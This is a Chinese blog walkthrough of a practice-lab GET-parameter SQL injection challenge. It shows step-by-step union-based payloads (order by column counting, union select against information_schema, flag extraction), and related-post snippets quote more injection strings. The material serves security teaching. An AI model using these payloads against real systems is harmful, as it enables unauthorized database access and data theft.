SQL注入——GET类型

最新推荐文章于 2024-06-05 14:13:37 发布
最新推荐文章于 2024-06-05 14:13:37 发布
阅读量2.9k 收藏 5
点赞数 2
分类专栏: 网络安全 文章标签: sql mysql 测试工程师 黑盒测试 白箱测试
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43264067/article/details/105906172
版权

SQL注入——GET类型

靶场地址

原理:
sql注入就是利用GET传参,用户提交数据与数据库进行交互,从数据库中提取有用的信息
第一题:
我们先在url栏测试一下,把id=1改成id=-1
在这里插入图片描述
结果页面就不显示了
表示存在sql注入漏洞在这里插入图片描述我们再查看一下源码,发现它是自动闭合的,不需要我们输入代码闭合在这里插入图片描述

接着,我在url轮流输入

  order by 1,2,3....

测试出它页面字段总数
在这里插入图片描述

在输入

order by 1,2,3,4

的时候它页面不显示了,于是判断出它字段数为3

在这里插入图片描述
得知它字段数过后,我就要查当前数据库的名字了。我在url栏利用联合查询

union select 1,2,database()

发现当前数据库名为error
在这里插入图片描述
查到数据库名,接下来就查表名了,我把前面的id=1改成id=1.1,再在后面输入

union select 1,2,table_name from information_schema.tables where table_schema=database() limit 0,1
在这里插入图片描述

接着用代码limit 1,1/2.1/3.1,把所有数据库的表名都查出来,发现只有两个表名:error_flag/user

初步判断flag可能存在error_flag表中,于是我开始 查error_flag表的列名
在代码栏继续输入

select 1,2,column_name from information_schema.columns where TABLE_NAME=‘error_flag’ limit 0,1
在这里插入图片描述我用limit得到所有列名,id;flag于是我们找到了flag,最后一步直接在url栏输入

select 1,2,flag from error_flag limit 0,1

用limit查出所有flag得到

在这里插入图片描述

用limit查出所有flag
zKaQ-Nf
zKaQ-BJY
zKaQ-XiaoFang
zKaq-98K
最后,发现是第一个flag

其他GET注入都是如此,但是闭合方式不同,有的是需要我们输入单引号闭合;需要我们输入’)闭合,再用#注释掉后面;需要我们输入”)闭合,再用#注释掉后面

猫鼠信安
关注
  • 2
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
SQL注入—字符注入(GET)
Ethan024的博客
03-22 538
SQL注入—数值注入(GET)(本文仅供学习或参考) 实验准备: 皮卡丘靶场—SQL Injection—数值注入(GET) 实验步骤: 当输入一个数据库里存在的用户名时候,会出现相关邮箱和id: 当输入一个不存在的字符串时,没有任何信息: 查看其URL,发现请求实在URL中提交的,是一个GET请求: http://localhost/pikaqiu.cn/vul/sqli/sqli_str.php?name=1111&submit=%E6%9F%A5%E8%AF%A2
SQL注入漏洞全接触——高级篇.txt
02-13
4.用Get方法注入时,IIS会记录你所有的提交字符串,对Post方法做则不记录,所以能用Post的网址尽量不用Get。 5. 猜解Access时只能用Ascii逐字解码法,SQLServer也可以用这种方法,只需要两者之间的区别即可,...
SQL注入之GET常规注入
Jim的博客
08-14 4433
less1单引号字符串注入 源码:$sql="select * from users where id='$id' limit 0,1"; $result=mysql_query($sql); $row=mysql_fetch_array($result); 注入:?id=1' or '1'='1  或者?id=1' or 1=1--%20 构建sql语句:?id=1' union se
sql注入靶场中的GET注入
weixin_75055385的博客
06-24 848
owasp十大漏洞中第一的sql注入
sql注入详解
最新发布
Cairo_A的博客
06-05 859
SQL注入是由于程序没有对用户输入数据的合法性进行验证和过滤,导致SQL查询语句被恶意拼接从 而产生SQL注入
SQL 注入 GET
weixin_63279914的博客
07-25 321
简单的SQL注入
GETsql注入教学
m0_67265441的博客
01-29 760
sql注入的原理:攻击者可以在web应用程序中事先定义好的查询语句的结尾上添加额外的。这说明后台在接受id这一个参数时and 1=1(真值),and 1=2(假值)生效了。第二步:判断列长度(靶场利用sqli-labs做为演示),以此来利用服务器进行恶意操作(一部分借鉴百度百科)。利用order by 语句和2分法可以判断出列长度为3。第三步:利用UNION SELECT判断回显位。通过刚刚的回显位来吧代码插入其中。第七步:通过列名把数据都列出来。第六步:通过表名查询列名。第一步:判断页面真假值。
sql中GET参数的讲解
qq_41306131的博客
12-03 1872
SQL中接收参数 单引号包括 $sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1" 加上1’ 报错 可以用 1‘ -++ 或者 #(%23) 注释 这里单引号和#只是用来注释 报错的话需要 id=-1 整数 $sql="SELECT *FROM users WHERE id=$id LIMIT 0,1"; 加上1‘ 报错为 使用’报错会...
HTTP协议的8种请求类型以及POST与GET的区别
Hern(宋兆恒)
01-01 3527
点击查看 GET 方法与 POST 方法的使用时机 HTTP协议简介 超文本传输协议(HTTP)的设计目的是保证客户机与服务器之间的通信。HTTP 的工作方式是客户机与服务器之间的请求-应答协议。web 浏览器可能是客户端,而计算机上的网络应用程序也可能作为服务器端。例如:客户端(浏览器)向服务器提交 HTTP 请求;服务器向客户端返回响应。响应包含关于请求的状态信息以及可能被请求的内容。 ...
sql注入与转义的php函数代码
01-20
sql注入:  正常情况下:  delete.php?id=3; $sql = ‘delete from news where id = ‘.$_GET[‘id’];  恶意情况:  delete.php?id=3 or 1; $sql = ‘delete from news where id = 3 or 1’; ——-如此执行后,...
【基础篇】第01篇:PHP代码审计笔记--SQL注入1
08-03
【PHP代码审计笔记——SQL注入1】主要探讨的是在PHP环境中如何防止SQL注入攻击,特别是针对MySQL数据库。SQL注入是一种常见的网络安全威胁,攻击者通过构造恶意的SQL语句,利用程序漏洞来执行非授权的操作,如获取...
php+mysql注入页面实现
09-11
PHP与MySQL注入页面的实现涉及到Web安全领域中的一个重要话题——SQL注入SQL注入是一种攻击手段,通过输入恶意的SQL代码,攻击者可以绕过网站的安全防护,获取、修改或删除数据库中的敏感信息。在这个过程中,我们...
sqljdbc4的jar包
07-05
3. **执行SQL语句**:使用Statement或PreparedStatement对象执行SQL查询,前者适用于静态SQL,后者用于防止SQL注入并提高性能。 4. **结果集处理**:通过ResultSet遍历查询结果,获取和处理数据。 5. **事务管理**...
sql to get data from flat file(zt from asktom)
congticuan8801的博客
04-27 141
Nag -- Thanks for the question regarding "sql to get data from flat file-- this is mind blowing", version 8.1.7o...
SQL注入概述与GET注入实例
weixin_59872639的博客
02-18 1222
SQL注入概述 什么是SQL注入漏洞 攻击者利用Web应用程序对用户输入验证上的疏忽,在输入的数据中包含对某些数据库系统有特殊意义的符号或命令,让攻击者有机会直接对后台数据库系统下达指令,进而实现对后台数据库乃至整个应用系统的入侵。 SQL注入原理 服务端没有过滤用户输入的恶意数据,直接把用户输入的数据当做SQL语句执行,从而影响数据库安全和平台安全。 两个条件 用户能够控制输入 原本程序要执行的SQL语句,拼接了用户输入的恶意数据 SQL注入过程 SQL注入危害 绕过
SQL注入分类,一看你就明白了。SQL注入点/SQL注入类型/SQL注入有几种/SQL注入点分类
热门推荐
wangyuxiang946的博客
02-18 2万+
根据输入的「参数」类型,可以将SQL注入分为两大类:「数值」注入、「字符」注入。 根据数据的「提交方式」分类:GET注入、POST注入、Cookie注入、HTTP Header注入。 根据页面「是否回显」分类:显注、盲注。
SQL注入类型
yggcwhat
12-13 2451
SQL注入类型详解 SQL 注入是指web应用程序对用户输入数据控制不严格,导致用户输入数据被拼接到SQL语句中被数据库执行导致的安全问题,按照注入方式可以分为联合注入、布尔盲注、时间盲注、堆叠注入以及报错注入等五种注入方式。在sql注入时影响返回单行的不仅仅是sql 语句的问题,有时是代码层面的问题。 判断注入是否存在 and 1=1,and 1=2 返回页面数据不同 ?id=3-1,返回数据内容不同 添加’、""以及其他特殊符号报错 … 联合注入 前提要求:数据会进行回显,页面有显位符,在一个在一个网
使用SQLmap进行注入流程
weixin_62715196的博客
08-10 2640
主要讲述SQLmap的主要功能以及对单个目标如何进行注入
sql注入getshell
09-09
SQL注入攻击是一种通过构造恶意的SQL语句来破坏数据库安全的技术。通过注入恶意的SQL代码,攻击者可以获取敏感信息,甚至可以在目标系统上执行任意命令,从而获得对系统的完全控制。通过getshell技术,攻击者可以在没有合法帐户的情况下,对目标系统进行远程控制。因此,避免SQL注入攻击和保护系统安全是非常重要的。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

猫鼠信安

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值